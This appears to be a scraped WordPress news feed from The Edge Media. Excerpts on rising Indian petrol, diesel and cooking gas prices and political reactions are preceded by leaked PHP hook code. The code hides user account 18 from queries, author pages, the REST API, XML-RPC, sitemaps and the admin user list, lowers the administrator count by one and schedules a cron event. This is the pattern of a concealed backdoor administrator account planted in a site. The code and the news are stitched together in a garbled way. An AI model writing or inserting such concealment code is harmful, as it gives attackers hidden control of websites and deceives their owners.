add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Price Hike of Diesel, Petrol, Cooking Gas After 4 Months appeared first on The Edge Media.
]]>Petrol and diesel prices in Mumbai, India’s financial hub, have risen to 110.82/liter and 95.00/liter, correspondingly. Fuel costs have also gone up in Chennai and Kolkata.
The post Price Hike of Diesel, Petrol, Cooking Gas After 4 Months appeared first on The Edge Media.
]]>The post BJP: The Maharashtra government should lower the VAT on gasoline and fuel appeared first on The Edge Media.
]]>
Patil told reporters in Kolhapur that they have organized an agitation across Maharashtra to press for the demand, citing the fact that 11 states across the country, some of which are not even run by the BJP, have reduced gasoline VAT to bring relief to the common man.”Malik has confirmed that he bought land from 1993 Mumbai serial bombings criminals,” Patil remarked in response to a question about state minister Nawab Malik, who has hurled many claims against BJP leader Devendra Fadnavis and others.
The post BJP: The Maharashtra government should lower the VAT on gasoline and fuel appeared first on The Edge Media.
]]>The post GDP means Higher Gas, Diesel, and Fuel Prices: Rahul’s Strike at the Centre appeared first on The Edge Media.
]]>Farmers, laborers, small enterprises, MSMEs salaried class are being demonetized, while Prime Minister’s buddies are being monetized, Rahul Gandhi remarked at a news conference. In the last seven years, the government has allegedly made Rs 23 lakh crore by raising gas, diesel, and petrol prices, according to the former Congress chief.
The post GDP means Higher Gas, Diesel, and Fuel Prices: Rahul’s Strike at the Centre appeared first on The Edge Media.
]]>The post Petrol crosses 100 rupee mark, diesel sees similar hike appeared first on The Edge Media.
]]>In Delhi, petrol rate has rocketed to Rs 93.94 for a litre and is being sold at Rs 100.19 in the financial capital. Fuel prices have jumped to Rs 93.97 in Kolkata and Rs 95.51 in Chennai.
Diesel price has seen a drastic increase this month. A litre of diesel costs Rs 84.89 in Delhi, Rs 92.17 in Mumbai, Rs 87.74 in Kolkata and Rs 89.65 in Chennai.
The post Petrol crosses 100 rupee mark, diesel sees similar hike appeared first on The Edge Media.
]]>The post Petrol and Diesel Prices hit new high appeared first on The Edge Media.
]]>In the national capital, Delhi petrol costs Rs. 92.85 and diesel Rs. 83.51. While in the Financial Capital, Mumbai petrol almost reaches the century mark with Rs. 99.14 while diesel is at Rs. 90.71, according to the data available on The Indian Oil Corporation’s official website.
Petrol and diesel prices are generally revised on a daily basis. So far this month, the price hike in petrol and diesel has taken place over 10 times in 18 days.
In India, fuel price differs from state to state depending on the Local Taxation and Freight charges. The central Government also charges an excise duty on the auto fuels. The central and state Governments make upto 60% of the retail selling price for petrol. Whereas for Diesel, it is 54%.
The post Petrol and Diesel Prices hit new high appeared first on The Edge Media.
]]>